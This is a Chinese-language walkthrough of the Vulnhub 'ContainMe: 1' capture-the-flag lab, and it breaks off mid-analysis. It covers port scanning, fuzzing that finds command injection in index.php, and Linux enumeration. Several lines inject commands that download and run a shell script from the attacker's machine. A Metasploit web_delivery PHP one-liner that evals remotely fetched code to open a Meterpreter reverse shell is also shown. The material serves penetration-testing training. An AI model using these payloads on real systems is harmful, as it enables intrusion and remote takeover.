【Vulnhub 靶场】【ContainMe: 1】【简单-中等】【20210729】

news2024/12/24 9:14:40

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/containme-1,729/
靶场下载:https://download.vulnhub.com/containme/THM-ContainMe-v4.ova
靶场难度:简单 - 中等
发布日期:2021年07月29日
文件大小:2.2 GB
靶场作者:IT Security Works
靶场系列:ContainMe
靶场描述:这是一个CTF。
打靶耗时:6+ 小时,Getshell很顺畅,但是后面操作就很是麻烦,需要一些时间去搞定
打靶关键

  1. Web 目录扫描、FUZZ 发现渗透点
  2. Linux 信息收集,可执行文件解析
  3. SSH 免密登录
  4. 内网主机发现 与 内网 MySQL 爆破

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~]
└─# nmap -PR -sn 192.168.110.0/24                                  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-16 02:15 EST
Nmap scan report for 192.168.110.1
Host is up (0.00082s latency).
MAC Address: 00:50:56:C0:00:01 (VMware)
Nmap scan report for 192.168.110.134
Host is up (0.0024s latency).
MAC Address: 00:0C:29:37:AB:42 (VMware)
Nmap scan report for 192.168.110.254
Host is up (0.00032s latency).
MAC Address: 00:50:56:F3:2A:1D (VMware)
Nmap scan report for 192.168.110.131
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 15.27 seconds
(base) ┌──(root㉿kali)-[~]
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.110.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-16 02:24 EST
Nmap scan report for 192.168.110.134
Host is up (0.0016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
22/tcp   open  ssh           OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a6:3e:80:d9:b0:98:fd:7e:09:6d:34:12:f9:15:8a:18 (RSA)
|   256 ec:5f:8a:1d:59:b3:59:2f:49:ef:fb:f4:4a:d0:1d:7a (ECDSA)
|_  256 b1:4a:22:dc:7f:60:e4:fc:08:0c:55:4f:e4:15:e0:fa (ED25519)
80/tcp   open  http          Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
2222/tcp open  EtherNetIP-1?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
8022/tcp open  ssh           OpenSSH 7.7p1 Ubuntu 4ppa1+obfuscated (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:ae:ea:27:3f:ab:10:ae:8c:2e:b3:0c:5b:d5:42:bc (RSA)
|   256 67:29:75:04:74:1b:83:d3:c8:de:6d:65:fe:e6:07:35 (ECDSA)
|_  256 7f:7e:89:c4:e0:a0:da:92:6e:a6:70:45:fc:43:23:84 (ED25519)
MAC Address: 00:0C:29:37:AB:42 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.60 ms 192.168.110.134

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 207.03 seconds
(base) ┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p 22,80,2222,8022 192.168.110.134
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-16 02:50 EST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.110.134
Host is up (0.0015s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|_  /info.php: Possible information file
|_http-dombased-xss: Couldn't find any DOM based XSS.
2222/tcp open  EtherNetIP-1
8022/tcp open  oa-system
MAC Address: 00:0C:29:37:AB:42 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 63.28 seconds

3、80端口

在这里插入图片描述

3.1、目录扫描

# 基础小字典,初扫摸底
dirb http://192.168.110.134
# 较全面 conda activate py37
dirsearch -u http://192.168.110.134 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.110.134" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.110.134 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.110.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.110.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://192.168.110.134 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
  • http://192.168.110.134/index.html
  • http://192.168.110.134/index.php
  • http://192.168.110.134/info.php

在这里插入图片描述
在这里插入图片描述

4、看页面好像是RCE - FUZZ

(base) ┌──(root㉿kali)-[~]
└─# ffuf -u "http://192.168.110.134/index.php?FUZZ=../../../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 59

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.134/index.php?FUZZ=../../../../../../../etc/passwd
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 59
________________________________________________

path                    [Status: 200, Size: 152, Words: 18, Lines: 12, Duration: 95ms]
:: Progress: [6453/6453] :: Job [1/1] :: 19 req/sec :: Duration: [0:00:43] :: Errors: 10 ::

在这里插入图片描述
在这里插入图片描述

4.1、看样子好像是个「find」命令

在这里插入图片描述

4.2、获取文件信息

在这里插入图片描述

  • 获取用户mike:1001(为什么是从1001开始的?1000去哪里了)
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
lxd:x:103:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:105:107::/nonexistent:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:108:1::/var/cache/pollinate:/bin/false
mike:x:1001:1001::/home/mike:/bin/bash

在这里插入图片描述
在这里插入图片描述

4.3、尝试了反弹命令,都不太行

4.4、上传文件访问(可成功)

http://192.168.110.134/index.php?path=/;cd /tmp;wget http://192.168.110.131/shell.sh;ls -al
http://192.168.110.134/index.php?path=/;bash /tmp/shell.sh

4.5、这里使用 MSF 生成 PHP 反弹连接命令

msf6 > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set target PHP
target => PHP
msf6 exploit(multi/script/web_delivery) > set LHOST 192.168.110.131
LHOST => 192.168.110.131
msf6 exploit(multi/script/web_delivery) > options 

Module options (exploit/multi/script/web_delivery):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on
                                        the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.110.131  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   PHP

View the full module info with the info, or info -d command.

msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.110.131:4444 
msf6 exploit(multi/script/web_delivery) > [*] Using URL: http://192.168.110.131:8080/6WDgqN
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.110.131:8080/6WDgqN', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
[*] 192.168.110.134  web_delivery - Delivering Payload (1116 bytes)
[*] Sending stage (39927 bytes) to 192.168.110.134
[*] Meterpreter session 1 opened (192.168.110.131:4444 -> 192.168.110.134:39742) at 2023-11-16 04:56:46 -0500
http://192.168.110.134/index.php?path=/;php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.110.131:8080/6WDgqN', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

5、Linux 信息收集

python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@host1:/var/www/html$

5.1、基础信息收集

www-data@host1:/var/www/html$ history
history
    1  history
www-data@host1:/var/www/html$ sudo -l
sudo -l
[sudo] password for www-data: 
Sorry, try again.
[sudo] password for www-data: 
Sorry, try again.
[sudo] password for www-data: 
sudo: 3 incorrect password attempts
www-data@host1:/var/www/html$ 
www-data@host1:/var/www/html$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
www-data@host1:/var/www/html$ crontab -l
crontab -l
no crontab for www-data
www-data@host1:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@host1:/var/www/html$ hostnamectl
hostnamectl
   Static hostname: host1
         Icon name: computer-container
           Chassis: container
        Machine ID: f0880e7f45a4495ba34f5ef3f6f696b5
           Boot ID: 7400c09955dc4aada3abec5aedb8cecd
    Virtualization: lxc
  Operating System: Ubuntu 18.04.5 LTS
            Kernel: Linux 4.15.0-147-generic
      Architecture: x86-64
www-data@host1:/var/www/html$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@host1:/var/www/html$ echo $BASH_VERSION
echo $BASH_VERSION
4.4.20(1)-release

在这里插入图片描述

5.2、文件信息收集

  • 发现特殊文件
    • SUID 权限:/home/mike/1cryptupx
    • ROOT 权限:/usr/share/man/zh_TW/crypt
www-data@host1:/home/mike$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/home/mike$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/share/man/zh_TW/crypt
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/at
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/gpasswd
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/mount
/bin/ping
/bin/su
/bin/umount
/bin/fusermount
/bin/ping6
www-data@host1:/home/mike$ ls -al
ls -al
total 384
drwxr-xr-x 5 mike mike   4096 Jul 30  2021 .
drwxr-xr-x 3 root root   4096 Jul 19  2021 ..
lrwxrwxrwx 1 root mike      9 Jul 19  2021 .bash_history -> /dev/null
-rw-r--r-- 1 mike mike    220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 mike mike   3771 Apr  4  2018 .bashrc
drwx------ 2 mike mike   4096 Jul 30  2021 .cache
drwx------ 3 mike mike   4096 Jul 30  2021 .gnupg
-rw-r--r-- 1 mike mike    807 Apr  4  2018 .profile
drwx------ 2 mike mike   4096 Jul 19  2021 .ssh
-rwxr-xr-x 1 mike mike 358668 Jul 30  2021 1cryptupx
www-data@host1:/home/mike$ ./1cryptupx
./1cryptupx
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

www-data@host1:/home/mike$ ls -al /usr/share/man/zh_TW/crypt
ls -al /usr/share/man/zh_TW/crypt
-rwsr-xr-x 1 root root 358668 Jul 30  2021 /usr/share/man/zh_TW/crypt
www-data@host1:/home/mike$ /usr/share/man/zh_TW/crypt
/usr/share/man/zh_TW/crypt
░█████╗░██████╗░██╗░░░██╗██████╗░████████╗░██████╗██╗░░██╗███████╗██╗░░░░░██╗░░░░░
██╔══██╗██╔══██╗╚██╗░██╔╝██╔══██╗╚══██╔══╝██╔════╝██║░░██║██╔════╝██║░░░░░██║░░░░░
██║░░╚═╝██████╔╝░╚████╔╝░██████╔╝░░░██║░░░╚█████╗░███████║█████╗░░██║░░░░░██║░░░░░
██║░░██╗██╔══██╗░░╚██╔╝░░██╔═══╝░░░░██║░░░░╚═══██╗██╔══██║██╔══╝░░██║░░░░░██║░░░░░
╚█████╔╝██║░░██║░░░██║░░░██║░░░░░░░░██║░░░██████╔╝██║░░██║███████╗███████╗███████╗
░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░░░░░░░╚═╝░░░╚═════╝░╚═╝░░╚═╝╚══════╝╚══════╝╚══════╝

www-data@host1:/home/mike$

5.3、进程信息(太干净了,感觉像是在容器中)

www-data@host1:/home/mike$ ss -tulpn
ss -tulpn
Netid State   Recv-Q  Send-Q          Local Address:Port     Peer Address:Port  
udp   UNCONN  0       0               127.0.0.53%lo:53            0.0.0.0:*     
udp   UNCONN  0       0         192.168.250.10%eth0:68            0.0.0.0:*     
tcp   LISTEN  0       128             127.0.0.53%lo:53            0.0.0.0:*     
tcp   LISTEN  0       128                   0.0.0.0:22            0.0.0.0:*     
tcp   LISTEN  0       128                         *:80                  *:*     
tcp   LISTEN  0       128                      [::]:22               [::]:*     
www-data@host1:/home/mike$ ps aux
ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.4 224944  8344 ?        Ss   00:56   0:01 /sbin/init
root        57  0.0  0.4  78324  9316 ?        Ss   00:56   0:00 /lib/systemd/systemd-journald
root        58  0.0  0.1  42112  3420 ?        Ss   00:56   0:00 /lib/systemd/systemd-udevd
systemd+   136  0.0  0.2  79916  4828 ?        Ss   00:56   0:00 /lib/systemd/systemd-networkd
systemd+   138  0.0  0.2  70628  4648 ?        Ss   00:56   0:00 /lib/systemd/systemd-resolved
message+   162  0.0  0.2  49940  4388 ?        Ss   00:57   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
daemon     194  0.0  0.1  28340  2400 ?        Ss   00:57   0:00 /usr/sbin/atd -f
root       195  0.0  0.8 169180 16848 ?        Ssl  00:57   0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       196  0.0  0.2  61884  5424 ?        Ss   00:57   0:00 /lib/systemd/systemd-logind
root       200  0.0  0.1  30112  3112 ?        Ss   00:57   0:00 /usr/sbin/cron -f
root       209  0.0  0.1  14776  2276 ?        Ss+  00:57   0:00 /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 linux
root       212  0.0  0.9 186036 19828 ?        Ssl  00:57   0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root       219  0.0  0.3  72308  6488 ?        Ss   00:57   0:00 /usr/sbin/sshd -D
root       220  0.0  0.7 327108 16320 ?        Ss   00:57   0:01 /usr/sbin/apache2 -k start
www-data  2138  0.0  0.6 331960 12640 ?        S    02:15   0:02 /usr/sbin/apache2 -k start
www-data  7873  0.0  0.0   4636   868 ?        S    04:22   0:00 sh -c ls -alh /;bash /tmp/shell.sh
www-data  7875  0.0  0.1  18384  3012 ?        S    04:22   0:00 bash /tmp/shell.sh
www-data  7876  0.0  0.1  18516  3440 ?        S    04:22   0:00 bash -i
www-data  7889  0.0  0.1  34412  2936 ?        R    04:29   0:00 ps aux
www-data 14429  0.0  0.6 331960 12648 ?        S    02:15   0:01 /usr/sbin/apache2 -k start
www-data 27304  0.0  0.6 331960 12644 ?        S    02:17   0:00 /usr/sbin/apache2 -k start
www-data 28410  0.0  0.6 331960 12648 ?        S    02:17   0:00 /usr/sbin/apache2 -k start
www-data 28411  0.0  0.6 331960 12648 ?        S    02:17   0:00 /usr/sbin/apache2 -k start
www-data@host1:/home/mike$ ps -ef
ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 00:56 ?        00:00:01 /sbin/init
root        57     1  0 00:56 ?        00:00:00 /lib/systemd/systemd-journald
root        58     1  0 00:56 ?        00:00:00 /lib/systemd/systemd-udevd
systemd+   136     1  0 00:56 ?        00:00:00 /lib/systemd/systemd-networkd
systemd+   138     1  0 00:56 ?        00:00:00 /lib/systemd/systemd-resolved
message+   162     1  0 00:57 ?        00:00:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
daemon     194     1  0 00:57 ?        00:00:00 /usr/sbin/atd -f
root       195     1  0 00:57 ?        00:00:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
root       196     1  0 00:57 ?        00:00:00 /lib/systemd/systemd-logind
root       200     1  0 00:57 ?        00:00:00 /usr/sbin/cron -f
root       209     1  0 00:57 ?        00:00:00 /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 linux
root       212     1  0 00:57 ?        00:00:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root       219     1  0 00:57 ?        00:00:00 /usr/sbin/sshd -D
root       220     1  0 00:57 ?        00:00:01 /usr/sbin/apache2 -k start
www-data  2138   220  0 02:15 ?        00:00:02 /usr/sbin/apache2 -k start
www-data  7873 28410  0 04:22 ?        00:00:00 sh -c ls -alh /;bash /tmp/shell.sh
www-data  7875  7873  0 04:22 ?        00:00:00 bash /tmp/shell.sh
www-data  7876  7875  0 04:22 ?        00:00:00 bash -i
www-data  7890  7876  0 04:29 ?        00:00:00 ps -ef
www-data 14429   220  0 02:15 ?        00:00:01 /usr/sbin/apache2 -k start
www-data 27304   220  0 02:17 ?        00:00:00 /usr/sbin/apache2 -k start
www-data 28410   220  0 02:17 ?        00:00:00 /usr/sbin/apache2 -k start
www-data 28411   220  0 02:17 ?        00:00:00 /usr/sbin/apache2 -k start
www-data@host1:/tmp$ ./pspy64
./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d

     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/11/16 04:31:44 CMD: UID=33    PID=28411  | /usr/sbin/apache2 -k start 
2023/11/16 04:31:44 CMD: UID=33    PID=28410  | /usr/sbin/apache2 -k start 
2023/11/16 04:31:44 CMD: UID=33    PID=27304  | /usr/sbin/apache2 -k start 
2023/11/16 04:31:44 CMD: UID=33    PID=14429  | /usr/sbin/apache2 -k start 
2023/11/16 04:31:44 CMD: UID=33    PID=7895   | ./pspy64 
2023/11/16 04:31:44 CMD: UID=33    PID=7876   | bash -i 
2023/11/16 04:31:44 CMD: UID=33    PID=7875   | bash /tmp/shell.sh 
2023/11/16 04:31:44 CMD: UID=33    PID=7873   | sh -c ls -alh /;bash /tmp/shell.sh 
2023/11/16 04:31:44 CMD: UID=33    PID=2138   | /usr/sbin/apache2 -k start 
2023/11/16 04:31:44 CMD: UID=0     PID=220    | /usr/sbin/apache2 -k start 
2023/11/16 04:31:44 CMD: UID=0     PID=219    | /usr/sbin/sshd -D 
2023/11/16 04:31:44 CMD: UID=0     PID=212    | /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal 
2023/11/16 04:31:44 CMD: UID=0     PID=209    | /sbin/agetty -o -p -- \u --noclear --keep-baud console 115200,38400,9600 linux 
2023/11/16 04:31:44 CMD: UID=0     PID=200    | /usr/sbin/cron -f 
2023/11/16 04:31:44 CMD: UID=0     PID=196    | /lib/systemd/systemd-logind 
2023/11/16 04:31:44 CMD: UID=0     PID=195    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2023/11/16 04:31:44 CMD: UID=1     PID=194    | /usr/sbin/atd -f 
2023/11/16 04:31:44 CMD: UID=105   PID=162    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2023/11/16 04:31:44 CMD: UID=102   PID=138    | /lib/systemd/systemd-resolved 
2023/11/16 04:31:44 CMD: UID=101   PID=136    | /lib/systemd/systemd-networkd 
2023/11/16 04:31:44 CMD: UID=0     PID=58     | /lib/systemd/systemd-udevd 
2023/11/16 04:31:44 CMD: UID=0     PID=57     | /lib/systemd/systemd-journald 
2023/11/16 04:31:44 CMD: UID=0     PID=1      | /sbin/init

5.4、容器检测

  • 按照判断,应该是在容器中
    • 存在内网IP:172.16.20.2
www-data@host1:/home/mike$ cat /proc/1/cgroup
cat /proc/1/cgroup
12:rdma:/
11:blkio:/
10:freezer:/
9:perf_event:/
8:memory:/
7:pids:/
6:hugetlb:/
5:cpuset:/
4:cpu,cpuacct:/
3:net_cls,net_prio:/
2:devices:/
1:name=systemd:/init.scope
0::/init.scope
www-data@host1:/home/mike$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.250.10  netmask 255.255.255.0  broadcast 192.168.250.255
        inet6 fe80::216:3eff:fe9c:ff0f  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:9c:ff:0f  txqueuelen 1000  (Ethernet)
        RX packets 985  bytes 3303568 (3.3 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 952  bytes 1247025 (1.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.20.2  netmask 255.255.255.0  broadcast 172.16.20.255
        inet6 fe80::216:3eff:fe46:6b29  prefixlen 64  scopeid 0x20<link>
        ether 00:16:3e:46:6b:29  txqueuelen 1000  (Ethernet)
        RX packets 63  bytes 4722 (4.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 24  bytes 1816 (1.8 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 526761  bytes 150209240 (150.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 526761  bytes 150209240 (150.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

www-data@host1:/home/mike$ find / -name *docker* 2>/dev/null
find / -name *docker* 2>/dev/null
/usr/lib/python3/dist-packages/sos/policies/runtimes/docker.py
/usr/lib/python3/dist-packages/sos/policies/runtimes/__pycache__/docker.cpython-36.pyc
/usr/lib/python3/dist-packages/sos/report/plugins/docker.py
/usr/lib/python3/dist-packages/sos/report/plugins/docker_distribution.py
/usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/docker.cpython-36.pyc
/usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/docker_distribution.cpython-36.pyc
www-data@host1:/home/mike$

6、文件传出,解析

# 直接查看二进制会异常显示,所以改成十六进制显示
xxd -ps /home/mike/1cryptupx

6.1、还原文件

在这里插入图片描述

6.2、文件解析

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# file file.bin                   
file.bin: ELF 64-bit MSB *unknown arch 0x3e00* (SYSV)

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# chmod +x file.bin                        
                                                                                                                               
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# strace ./file.bin
execve("./file.bin", ["./file.bin"], 0x7ffc44fde130 /* 40 vars */) = 0
open("/proc/self/exe", O_RDONLY)        = 3
mmap(NULL, 358350, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f46cb1f0000
mmap(0x7f46cb1f0000, 357952, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x7f46cb1f0000
mprotect(0x7f46cb246000, 6094, PROT_READ|PROT_EXEC) = 0
readlink("/proc/self/exe", "/usr/local/soft/hack/file.bin", 4095) = 29
mmap(0x400000, 937984, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400000
mmap(0x400000, 1160, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400000
mprotect(0x400000, 1160, PROT_READ)     = 0
mmap(0x401000, 602665, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0x1000) = 0x401000
